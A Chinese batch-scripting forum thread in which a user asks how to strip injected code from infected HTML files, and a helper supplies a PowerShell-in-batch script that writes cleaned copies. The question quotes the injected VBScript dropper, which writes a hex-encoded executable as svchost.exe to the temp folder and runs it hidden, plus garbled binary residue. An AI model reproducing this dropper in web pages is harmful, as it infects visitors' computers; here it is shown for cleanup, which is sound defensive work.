[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖

[文件操作] 如何用批处理批量删除HTML文件的特定内容

本帖最后由 pcl_test 于 2017-1-9 10:10 编辑

电脑中了木码,导致硬盘上面所有以*.html和*.htm文件结尾的文件,在文件</html>标签之后被加上了一段代码,代码具体内容见附件,我已单独保存出来了。现在就想通过一个批处理命令来把所有被篡改的文件改回来,这些被感染文件都是需要的,不能被删除,
  1. <html>
  2. <head>
  3. </head>
  4. <body>
  5. ……
  6. </body>
  7. </html>
  8. <SCRIPT Language=VBScript><!--
  9. DropFileName = "svchost.exe"
  10. WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B9638…………73672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000000000000000000000000000000000000000000000000000000"
  11. Set FSO = CreateObject("Scripting.FileSystemObject")
  12. DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
  13. If FSO.FileExists(DropPath)=False Then
  14. Set FileObj = FSO.CreateTextFile(DropPath, True)
  15. For i = 1 To Len(WriteData) Step 2
  16. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
  17. Next
  18. FileObj.Close
  19. End If
  20. Set WSHshell = CreateObject("WScript.Shell")
  21. WSHshell.Run DropPath, 0
  22. //--></SCRIPT><!--??懔?図妽譨_9鯥歍x<+5皈┵sPq"古啭e"黳y6еR跤郙傩?啢?c皥昆y??瓗-k-?啍跪o玽9䅟V鑰芮.道Q趌幼d~?sk"扷X紃憴?A鈂檷炶?浏 撍M}瓖_砢~岭_'椬?V??栜T'?; ki(1w?Jm牯廫\|+r劗穌纏?2騉M≥]@瘜b
  23. NWA%菐%j毐N?/蹧?蕆3縁
复制代码

回复 22# pcl_test


    好的,我懂了!谢谢……

TOP

回复 21# jwentang

只搜索批处理所在目录及其子目录的htm/html文件

TOP

回复 18# pcl_test


    拿了几个hmtl文件在桌面测试的时候发现是修改了运行文件当前所在的目录及下级目录,但其他目录下的文件没有被修改,另外,我复制到其他目录下面去执行的时候,就还是命令窗口的光标一直在闪,没有任何提示,是在检索文件比较费时间还是其他什么原因吗?

TOP

本帖最后由 pcl_test 于 2017-1-9 15:14 编辑

回复 19# jwentang

已改,新建一个bat文件,复制粘贴代码进去,生成的以New_开头的就是修复的html文件

TOP

回复 18# pcl_test


    大神啊,运行之后一点反应没有啊,只有命令窗口光标符在闪,这是啥情况?

TOP

本帖最后由 pcl_test 于 2017-1-9 15:16 编辑
  1. @echo off
  2. powershell /? >nul 2>&1||(echo;系统没有自带或未安装powershell&pause&exit)
  3. powershell ^
  4.     function DelVirusCodes($htmlfile, $encoding){^
  5.         $text=[IO.File]::ReadAllText($htmlfile, [Text.Encoding]::GetEncoding($encoding));^
  6.         if($text -match '[\s\S]+^<\/html^>'){return $matches[0]};^
  7.     }^
  8.     ^<# 指定以哪种编码读写html文件,如utf-8,gbk,gb2312,utf-16等^
  9.     具体支持的编码可参看https://msdn.microsoft.com/zh-cn/library/system.text.encoding.aspx #^>^
  10.     $cs = 'utf-8';^
  11.     ls . *.htm -r^|%%{^
  12.         write-host ('正在修复'+$_.FullName);^
  13.         [IO.File]::WriteAllText(^
  14.             ($_.DirectoryName+'\New_'+$_.Name),^
  15.                 (DelVirusCodes $_.FullName $cs),^
  16.                     [Text.Encoding]::GetEncoding($cs))^
  17.     }
  18. pause
复制代码

TOP

回复 9# yu2n


    谢谢……
但js我本地好像运行不起来

TOP

回复 15# Batcher


    已经放到网盘了,请看下

TOP

回复 14# jwentang


    我用Chrome 55测试没有问题。如果是因为压缩之后的文件仍然很大超过了论坛限制,那建议放到网盘吧。
我帮忙写的代码不需要付钱。如果一定要给,请在微信群或QQ群发给大家吧。
【微信公众号、微信群、QQ群】http://bbs.bathome.net/thread-3473-1-1.html
【支持批处理之家,加入VIP会员!】http://bbs.bathome.net/thread-67716-1-1.html

TOP

回复 12# Batcher


    报歉,我用的是chrome55,win7 64位的

TOP

像现在这样,直接贴出文本就很直观的  大家都能直观看到

TOP

回复 11# jwentang


    我的意思是谁为什么别人可以上传压缩文件,但你无法上传,有可能是浏览器的问题。
我帮忙写的代码不需要付钱。如果一定要给,请在微信群或QQ群发给大家吧。
【微信公众号、微信群、QQ群】http://bbs.bathome.net/thread-3473-1-1.html
【支持批处理之家,加入VIP会员!】http://bbs.bathome.net/thread-67716-1-1.html

TOP

回复 10# Batcher


    这和浏览器没有关系吧,电脑中了木码,导致HTML文件被感染,杀完毒也不行,一旦运行被感染的HTML文件,就又中毒了!杀完毒后还得把所有中木码的html文件中的代码清理掉,感觉只能用批处理来操作!

TOP

回复 5# jwentang


    什么浏览器?
我帮忙写的代码不需要付钱。如果一定要给,请在微信群或QQ群发给大家吧。
【微信公众号、微信群、QQ群】http://bbs.bathome.net/thread-3473-1-1.html
【支持批处理之家,加入VIP会员!】http://bbs.bathome.net/thread-67716-1-1.html

TOP

返回列表